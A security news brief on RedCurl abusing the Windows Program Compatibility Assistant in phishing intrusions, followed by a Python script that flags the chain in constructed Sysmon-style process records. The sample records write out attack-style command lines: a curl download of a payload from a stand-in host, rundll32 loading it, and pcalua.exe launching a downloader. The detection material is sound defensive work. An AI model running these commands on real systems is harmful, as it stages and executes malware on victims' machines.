Russian hacking group RedCurl, also tracked as Red Wolf and Earth Kapre, has been concealing its cyberespionage operations by abusing the Windows Program Compatibility Assistant (PCA), a legitimate tool originally intended to resolve compatibility problems with older programs, according to The Hacker News.
RedCurl's phishing emails carry malicious .ISO and .IMG attachments that trigger a multi-stage attack: an executable inside the image uses the curl utility to fetch a loader, and the loader then invokes PCA to launch a further downloader, a report from Trend Micro showed. The intrusions also involved use of the Impacket toolkit for unauthorized remote command execution. The findings indicate RedCurl's continuous efforts to obfuscate malicious operations, researchers said. "This case underscores the ongoing and active threat posed by Earth Kapre, a threat actor that targets a diverse range of industries across multiple countries," added researchers. The report follows a Lab52 study revealing that the Russian state-sponsored threat operation Turla has been using a novel wrapper DLL, dubbed Pelmeni, to distribute Kazuar malware.
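As an added illustration of how the chain described above might be spotted in endpoint telemetry (example code written for this page, not part of the Trend Micro or Hacker News reporting): the script below reconstructs parent/child process chains from constructed Sysmon-style process-creation records and flags two of the behaviours described, curl.exe fetching a URL on behalf of an executable running outside trusted Windows directories, and any process launched through the Program Compatibility Assistant. The article does not name the PCA binary; the example assumes it is pcalua.exe with its -a switch. All event fields, paths and the URL are made up.

```python
"""Flag the described attack chain in Sysmon-style process-creation records."""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 style fields)."""
    pid: int
    ppid: int
    image: str     # full path of the new process
    cmdline: str   # its command line


# Constructed sample telemetry (not from the report). Chain modelled:
# executable from mounted image -> curl.exe fetch -> loader -> PCA -> downloader.
# The PCA launcher is assumed to be pcalua.exe; names and URL are invented.
SAMPLE_EVENTS: List[ProcEvent] = [
    ProcEvent(100, 1,   r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"E:\Invoice.exe", r"E:\Invoice.exe"),
    ProcEvent(210, 200, r"C:\Windows\System32\curl.exe",
              r"curl.exe -o C:\Users\Public\netutils.dll https://example.invalid/n.bin"),
    ProcEvent(220, 200, r"C:\Windows\System32\rundll32.exe",
              r"rundll32.exe C:\Users\Public\netutils.dll,Start"),
    ProcEvent(230, 220, r"C:\Windows\System32\pcalua.exe",
              r"pcalua.exe -a C:\Users\Public\update.exe"),
    ProcEvent(240, 230, r"C:\Users\Public\update.exe", r"C:\Users\Public\update.exe"),
    # Benign noise: an administrator running curl from an interactive shell.
    ProcEvent(300, 100, r"C:\Windows\System32\cmd.exe", "cmd.exe"),
    ProcEvent(310, 300, r"C:\Windows\System32\curl.exe",
              r"curl.exe https://example.invalid/status"),
]

# Directories whose binaries are treated as trusted parents for curl.exe.
TRUSTED_DIRS = ("c:\\windows\\", "c:\\program files")
URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Lower-cased file name component of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def is_trusted_path(path: str) -> bool:
    return path.lower().startswith(TRUSTED_DIRS)


def ancestry(pid: int, by_pid: Dict[int, ProcEvent]) -> str:
    """Render the root-to-leaf process chain by image name for an alert."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return " > ".join(reversed(chain))


def detect(events: List[ProcEvent]) -> List[dict]:
    """Return one alert dict per matching event, in event order."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        parent = by_pid.get(ev.ppid)
        if parent is None:
            continue
        # Rule 1: curl.exe fetching a URL for a parent outside trusted directories.
        if (basename(ev.image) == "curl.exe" and URL_RE.search(ev.cmdline)
                and not is_trusted_path(parent.image)):
            alerts.append({"rule": "curl_from_untrusted_parent", "pid": ev.pid,
                           "chain": ancestry(ev.pid, by_pid)})
        # Rule 2: anything started through the Program Compatibility Assistant.
        if basename(parent.image) == "pcalua.exe":
            alerts.append({"rule": "pca_proxy_execution", "pid": ev.pid,
                           "chain": ancestry(ev.pid, by_pid)})
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"{alert['rule']:28} pid={alert['pid']}  {alert['chain']}")
```

The administrator's curl.exe launched from cmd.exe (pid 310) is not flagged because its parent lives under C:\Windows, while the same binary spawned by an executable on the mounted E: drive is; the second rule fires on any child of the PCA launcher regardless of path, since legitimate software rarely needs to be started that way.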